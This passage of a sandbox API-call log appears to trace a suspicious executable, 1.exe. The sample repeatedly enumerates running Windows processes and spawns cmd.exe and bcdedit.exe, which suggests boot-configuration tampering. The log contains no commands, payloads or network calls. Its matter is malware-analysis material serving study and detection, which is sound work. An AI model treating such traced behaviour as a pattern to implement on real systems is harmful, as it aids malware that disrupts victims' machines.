th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.730] GetLastError () returned 0x12 [0152.730] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.731] GetLastError () returned 0x12 [0152.731] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x498, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.731] GetLastError () returned 0x12 [0152.732] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.732] GetLastError () returned 0x12 [0152.732] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.733] GetLastError () returned 0x12 [0152.733] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.733] GetLastError () returned 0x12 [0152.733] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.734] GetLastError () returned 0x12 [0152.734] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0152.735] GetLastError () returned 0x12 [0152.735] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.735] GetLastError () returned 0x12 [0152.735] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0152.736] GetLastError () returned 0x12 [0152.736] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0152.737] GetLastError () returned 0x12 [0152.737] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.737] GetLastError () returned 0x12 [0152.737] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0152.738] GetLastError () returned 0x12 [0152.738] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0152.739] GetLastError () returned 0x12 [0152.739] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0152.739] GetLastError () returned 0x12 [0152.739] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0152.740] GetLastError () returned 0x12 [0152.740] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3b, th32ParentProcessID=0x8a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0152.741] GetLastError () returned 0x12 [0152.741] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0152.741] GetLastError () returned 0x12 [0152.741] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0152.742] GetLastError () returned 0x12 [0152.742] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0152.742] GetLastError () returned 0x12 [0152.743] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0152.743] GetLastError () returned 0x12 [0152.743] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x8cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0152.744] GetLastError () returned 0x12 [0152.744] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0152.744] GetLastError () returned 0x12 [0152.744] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0152.745] GetLastError () returned 0x12 [0152.745] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0152.746] GetLastError () returned 0x12 [0152.746] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0152.746] GetLastError () returned 0x12 [0152.746] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0152.747] GetLastError () returned 0x12 [0152.747] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.748] GetLastError () returned 0x12 [0152.748] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="bcdedit.exe")) returned 1 [0152.748] GetLastError () returned 0x12 [0152.748] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="bcdedit.exe")) returned 0 [0152.749] CloseHandle (hObject=0x2e4) returned 1 [0152.749] Sleep (dwMilliseconds=0x1f4) [0153.337] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x300 [0153.376] Process32FirstW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.377] GetLastError () returned 0x12 [0153.377] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0153.377] GetLastError () returned 0x12 [0153.378] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0153.378] GetLastError () returned 0x12 [0153.378] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0153.379] GetLastError () returned 0x12 [0153.379] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0153.380] GetLastError () returned 0x12 [0153.380] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0153.380] GetLastError () returned 0x12 [0153.380] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0153.381] GetLastError () returned 0x12 [0153.381] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0153.381] GetLastError () returned 0x12 [0153.382] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0153.382] GetLastError () returned 0x12 [0153.382] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0153.383] GetLastError () returned 0x12 [0153.383] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0153.383] GetLastError () returned 0x12 [0153.383] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.384] GetLastError () returned 0x12 [0153.384] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.385] GetLastError () returned 0x12 [0153.385] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0153.385] GetLastError () returned 0x12 [0153.385] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x48, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.386] GetLastError () returned 0x12 [0153.386] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.387] GetLastError () returned 0x12 [0153.387] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.387] GetLastError () returned 0x12 [0153.387] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.388] GetLastError () returned 0x12 [0153.388] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.389] GetLastError () returned 0x12 [0153.389] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x498, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.389] GetLastError () returned 0x12 [0153.389] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.390] GetLastError () returned 0x12 [0153.390] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.390] GetLastError () returned 0x12 [0153.391] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.391] GetLastError () returned 0x12 [0153.391] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.392] GetLastError () returned 0x12 [0153.392] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0153.392] GetLastError () returned 0x12 [0153.392] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.393] GetLastError () returned 0x12 [0153.393] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0153.394] GetLastError () returned 0x12 [0153.394] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0153.395] GetLastError () returned 0x12 [0153.395] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.396] GetLastError () returned 0x12 [0153.396] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0153.396] GetLastError () returned 0x12 [0153.396] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0153.397] GetLastError () returned 0x12 [0153.397] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0153.398] GetLastError () returned 0x12 [0153.398] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0153.398] GetLastError () returned 0x12 [0153.398] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3b, th32ParentProcessID=0x8a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0153.399] GetLastError () returned 0x12 [0153.399] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0153.400] GetLastError () returned 0x12 [0153.400] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0153.400] GetLastError () returned 0x12 [0153.400] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0153.401] GetLastError () returned 0x12 [0153.401] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0153.402] GetLastError () returned 0x12 [0153.402] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x8cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0153.402] GetLastError () returned 0x12 [0153.402] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0153.403] GetLastError () returned 0x12 [0153.403] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0153.404] GetLastError () returned 0x12 [0153.404] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0153.404] GetLastError () returned 0x12 [0153.404] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0153.405] GetLastError () returned 0x12 [0153.405] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf38, 